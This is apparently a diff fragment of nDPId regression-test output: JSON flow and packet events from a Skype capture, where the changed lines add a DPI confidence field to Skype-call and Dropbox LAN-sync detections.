-00631{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":589,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970648822,"flow_last_seen":1431970648822,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431970648822,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.32","src_port":13021,"dst_port":40022,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":589,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970648822,"flow_last_seen":1431970648822,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431970648822,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.32","src_port":13021,"dst_port":40022,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":590,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970648822,"flow_last_seen":1431970648822,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1431970648822,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.33","src_port":13021,"dst_port":40011,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":590,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":1,"flow_last_seen":1431970648822,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"ts_msec":1431970648822,"pkt":"0NQSxnP1PBXCt3IOCABFAAA+1vAAAEARJ\/bAqAEib91KITLdnEsAKklketkCS\/KCvZwmcOx3xDmHrpkfhUG8CXubM92mElOOFhZFlQ=="}
-00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":590,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970648822,"flow_last_seen":1431970648822,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1431970648822,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.33","src_port":13021,"dst_port":40011,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":590,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970648822,"flow_last_seen":1431970648822,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1431970648822,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.33","src_port":13021,"dst_port":40011,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":591,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970648822,"flow_last_seen":1431970648822,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1431970648822,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.145","src_port":13021,"dst_port":40008,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":591,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":1,"flow_last_seen":1431970648822,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":72,"pkt_l4_len":38,"ts_msec":1431970648822,"pkt":"0NQSxnP1PBXCt3IOCABFAAA6md0AAEARSUPAqAEinTc4kTLdnEgAJsmIetsCpJOMytcJAiTHtz9O4hYGu7tAbRVxbii4hHFE"}
-00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":591,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970648822,"flow_last_seen":1431970648822,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1431970648822,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.145","src_port":13021,"dst_port":40008,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":591,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970648822,"flow_last_seen":1431970648822,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1431970648822,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.145","src_port":13021,"dst_port":40008,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":592,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970648822,"flow_last_seen":1431970648822,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1431970648822,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.13","src_port":13021,"dst_port":40009,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":592,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":1,"flow_last_seen":1431970648822,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":71,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":71,"pkt_l4_len":37,"ts_msec":1431970648822,"pkt":"0NQSxnP1PBXCt3IOCABFAAA5n+IAAEAR+MLAqAEiQTffDTLdnEkAJdiCet0C1RhCM\/VIp+W5EaRfz2WprIWREBw71gUfrFc="}
-00631{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":592,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970648822,"flow_last_seen":1431970648822,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1431970648822,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.13","src_port":13021,"dst_port":40009,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":592,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970648822,"flow_last_seen":1431970648822,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1431970648822,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.13","src_port":13021,"dst_port":40009,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":593,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970648822,"flow_last_seen":1431970648822,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1431970648822,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.19","src_port":13021,"dst_port":40020,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":593,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":1,"flow_last_seen":1431970648822,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":68,"pkt_l4_len":34,"ts_msec":1431970648822,"pkt":"0NQSxnP1PBXCt3IOCABFAAA29EUAAEAR81vAqAEinTg0EzLdnFQAIrQSet8CIfzcSNY9VVu6zPT0+wzX1iqsIu28Tro="}
-00631{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":593,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970648822,"flow_last_seen":1431970648822,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1431970648822,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.19","src_port":13021,"dst_port":40020,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":593,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970648822,"flow_last_seen":1431970648822,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1431970648822,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.19","src_port":13021,"dst_port":40020,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":594,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970648880,"flow_last_seen":1431970648880,"flow_idle_time":180000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":502,"flow_avg_l4_payload_len":502,"midstream":0,"ts_msec":1431970648880,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01125{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":594,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":1,"flow_last_seen":1431970648880,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":544,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":544,"pkt_l4_len":510,"ts_msec":1431970648880,"pkt":"\/\/\/\/\/\/\/\/PBXCt3IOCABFAAISCYEAAEARrZDAqAEi\/\/\/\/\/0RcRFwB\/vqceyJob3N0X2ludCI6IDE1NzMxOTU0NDUsICJ2ZXJzaW9uIjogWzEsIDhdLCAiZGlzcGxheW5hbWUiOiAiIiwgInBvcnQiOiAxNzUwMCwgIm5hbWVzcGFjZXMiOiBbMTQ4MTkzMzcsIDE3NjA5OTYzLCAyMDY0OTM0OSwgMjg1MjE2MDcsIDU4MzQ0OTk2LCA2MDU5NDk4MywgNjQ0MzYwOTksIDk2ODUzMjI0LCA5OTQ2OTc3MywgMTAxMDQ3OTk2LCAxMDgxNTkxMDIsIDEyNTU0MDU2NiwgMTc2OTY0MzA3LCAyNDM2ODI5ODYsIDI0NzkyNTA4NSwgMjYwNDY1MjYxLCAyNzA0MDQ3NDIsIDI4Mzg2MTQ1NywgNDI0NTQwMTk3LCA0NDgzOTczOTMsIDQ1MTQ3MjY1OCwgNTExNzA2NjQyLCA1NjgzOTU4MzMsIDU5NDI0Njk1NCwgNTk4MDYxMDY2LCA2MTU5ODMzNzksIDcyMDA1ODM2MSwgNzM1MDUxODMwLCA3MzYzNDE1MjgsIDc0MTI1NTYxMywgNzc2MDg3MjQ3LCA3ODA4NzA1ODEsIDc4Mjk4MTk0OSwgNzg1MjY2MTc3LCA4MTg3NTI3MTAsIDg1NTY4MjM5MCwgODg0MTIwMTMyLCA5MDg5MTQ4NjhdfQ=="}
-00625{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":594,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970648880,"flow_last_seen":1431970648880,"flow_idle_time":180000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":502,"flow_avg_l4_payload_len":502,"midstream":0,"ts_msec":1431970648880,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
+00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":594,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970648880,"flow_last_seen":1431970648880,"flow_idle_time":180000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":502,"flow_avg_l4_payload_len":502,"midstream":0,"ts_msec":1431970648880,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":595,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970648880,"flow_last_seen":1431970648880,"flow_idle_time":180000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":502,"flow_avg_l4_payload_len":502,"midstream":0,"ts_msec":1431970648880,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01121{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":595,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":1,"flow_last_seen":1431970648880,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":544,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":544,"pkt_l4_len":510,"ts_msec":1431970648880,"pkt":"\/\/\/\/\/\/\/\/PBXCt3IOCABFAAIStlkAAEARPhDAqAEiwKgB\/0RcRFwB\/jf1eyJob3N0X2ludCI6IDE1NzMxOTU0NDUsICJ2ZXJzaW9uIjogWzEsIDhdLCAiZGlzcGxheW5hbWUiOiAiIiwgInBvcnQiOiAxNzUwMCwgIm5hbWVzcGFjZXMiOiBbMTQ4MTkzMzcsIDE3NjA5OTYzLCAyMDY0OTM0OSwgMjg1MjE2MDcsIDU4MzQ0OTk2LCA2MDU5NDk4MywgNjQ0MzYwOTksIDk2ODUzMjI0LCA5OTQ2OTc3MywgMTAxMDQ3OTk2LCAxMDgxNTkxMDIsIDEyNTU0MDU2NiwgMTc2OTY0MzA3LCAyNDM2ODI5ODYsIDI0NzkyNTA4NSwgMjYwNDY1MjYxLCAyNzA0MDQ3NDIsIDI4Mzg2MTQ1NywgNDI0NTQwMTk3LCA0NDgzOTczOTMsIDQ1MTQ3MjY1OCwgNTExNzA2NjQyLCA1NjgzOTU4MzMsIDU5NDI0Njk1NCwgNTk4MDYxMDY2LCA2MTU5ODMzNzksIDcyMDA1ODM2MSwgNzM1MDUxODMwLCA3MzYzNDE1MjgsIDc0MTI1NTYxMywgNzc2MDg3MjQ3LCA3ODA4NzA1ODEsIDc4Mjk4MTk0OSwgNzg1MjY2MTc3LCA4MTg3NTI3MTAsIDg1NTY4MjM5MCwgODg0MTIwMTMyLCA5MDg5MTQ4NjhdfQ=="}
-00623{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":595,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970648880,"flow_last_seen":1431970648880,"flow_idle_time":180000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":502,"flow_avg_l4_payload_len":502,"midstream":0,"ts_msec":1431970648880,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
+00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":595,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970648880,"flow_last_seen":1431970648880,"flow_idle_time":180000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":502,"flow_avg_l4_payload_len":502,"midstream":0,"ts_msec":1431970648880,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":596,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970648979,"flow_last_seen":1431970648979,"flow_idle_time":180000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":502,"flow_avg_l4_payload_len":502,"midstream":0,"ts_msec":1431970648979,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01125{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":596,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":1,"flow_last_seen":1431970648979,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":544,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":544,"pkt_l4_len":510,"ts_msec":1431970648979,"pkt":"\/\/\/\/\/\/\/\/xCwDBkn+CABFAAIS99EAAEARvwXAqAFc\/\/\/\/\/0RcRFwB\/v9VeyJob3N0X2ludCI6IDMzNzUzNTk1OTMsICJ2ZXJzaW9uIjogWzEsIDhdLCAiZGlzcGxheW5hbWUiOiAiIiwgInBvcnQiOiAxNzUwMCwgIm5hbWVzcGFjZXMiOiBbMTQ4MTkzMzcsIDE3NjA5OTYzLCAyMDY0OTM0OSwgMjg1MjE2MDcsIDU4MzQ0OTk2LCA2MDU5NDk4MywgNjQ0MzYwOTksIDk2ODUzMjI0LCA5OTQ2OTc3MywgMTAxMDQ3OTk2LCAxMDgxNTkxMDIsIDEyNTU0MDU2NiwgMTc2OTY0MzA3LCAyNDM2ODI5ODYsIDI0NzkyNTA4NSwgMjYwNDY1MjYxLCAyNzA0MDQ3NDIsIDI4Mzg2MTQ1NywgNDI0NTQwMTk3LCA0NDgzOTczOTMsIDQ1MTQ3MjY1OCwgNTExNzA2NjQyLCA1NjgzOTU4MzMsIDU5NDI0Njk1NCwgNTk4MDYxMDY2LCA2MTU5ODMzNzksIDcyMDA1ODM2MSwgNzM1MDUxODMwLCA3MzYzNDE1MjgsIDc0MTI1NTYxMywgNzc2MDg3MjQ3LCA3ODA4NzA1ODEsIDc4Mjk4MTk0OSwgNzg1MjY2MTc3LCA4MTg3NTI3MTAsIDg1NTY4MjM5MCwgODg0MTIwMTMyLCA5MDg5MTQ4NjhdfQ=="}
-00625{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":596,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970648979,"flow_last_seen":1431970648979,"flow_idle_time":180000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":502,"flow_avg_l4_payload_len":502,"midstream":0,"ts_msec":1431970648979,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
+00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":596,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970648979,"flow_last_seen":1431970648979,"flow_idle_time":180000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":502,"flow_avg_l4_payload_len":502,"midstream":0,"ts_msec":1431970648979,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":597,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970648982,"flow_last_seen":1431970648982,"flow_idle_time":180000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":502,"flow_avg_l4_payload_len":502,"midstream":0,"ts_msec":1431970648982,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01121{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":597,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":1,"flow_last_seen":1431970648982,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":544,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":544,"pkt_l4_len":510,"ts_msec":1431970648982,"pkt":"\/\/\/\/\/\/\/\/xCwDBkn+CABFAAISMXYAAEARwrnAqAFcwKgB\/0RcRFwB\/jyueyJob3N0X2ludCI6IDMzNzUzNTk1OTMsICJ2ZXJzaW9uIjogWzEsIDhdLCAiZGlzcGxheW5hbWUiOiAiIiwgInBvcnQiOiAxNzUwMCwgIm5hbWVzcGFjZXMiOiBbMTQ4MTkzMzcsIDE3NjA5OTYzLCAyMDY0OTM0OSwgMjg1MjE2MDcsIDU4MzQ0OTk2LCA2MDU5NDk4MywgNjQ0MzYwOTksIDk2ODUzMjI0LCA5OTQ2OTc3MywgMTAxMDQ3OTk2LCAxMDgxNTkxMDIsIDEyNTU0MDU2NiwgMTc2OTY0MzA3LCAyNDM2ODI5ODYsIDI0NzkyNTA4NSwgMjYwNDY1MjYxLCAyNzA0MDQ3NDIsIDI4Mzg2MTQ1NywgNDI0NTQwMTk3LCA0NDgzOTczOTMsIDQ1MTQ3MjY1OCwgNTExNzA2NjQyLCA1NjgzOTU4MzMsIDU5NDI0Njk1NCwgNTk4MDYxMDY2LCA2MTU5ODMzNzksIDcyMDA1ODM2MSwgNzM1MDUxODMwLCA3MzYzNDE1MjgsIDc0MTI1NTYxMywgNzc2MDg3MjQ3LCA3ODA4NzA1ODEsIDc4Mjk4MTk0OSwgNzg1MjY2MTc3LCA4MTg3NTI3MTAsIDg1NTY4MjM5MCwgODg0MTIwMTMyLCA5MDg5MTQ4NjhdfQ=="}
-00623{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":597,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970648982,"flow_last_seen":1431970648982,"flow_idle_time":180000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":502,"flow_avg_l4_payload_len":502,"midstream":0,"ts_msec":1431970648982,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
+00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":597,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970648982,"flow_last_seen":1431970648982,"flow_idle_time":180000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":502,"flow_avg_l4_payload_len":502,"midstream":0,"ts_msec":1431970648982,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":601,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970649777,"flow_last_seen":1431970649777,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1431970649777,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.147","src_port":51234,"dst_port":40001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":601,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":1,"flow_last_seen":1431970649777,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1431970649777,"pkt":"0NQSxnP1PBXCt3IOCABFAABADS1AAEAG4vXAqAEinTfrk8ginEEPp71\/AAAAALAC\/\/+7IQAAAgQFtAEDAwUBAQgKPjHBiQAAAAAEAgAA"}
 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":602,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970649777,"flow_last_seen":1431970649777,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1431970649777,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.45","src_port":51235,"dst_port":40009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -233,19 +233,19 @@
 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":603,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":1,"flow_last_seen":1431970649777,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1431970649777,"pkt":"0NQSxnP1PBXCt3IOCABFAABATBhAAEAGcsvAqAEib91KLcgknEjYMAm6AAAAALAC\/\/91FQAAAgQFtAEDAwUBAQgKPjHBiQAAAAAEAgAA"}
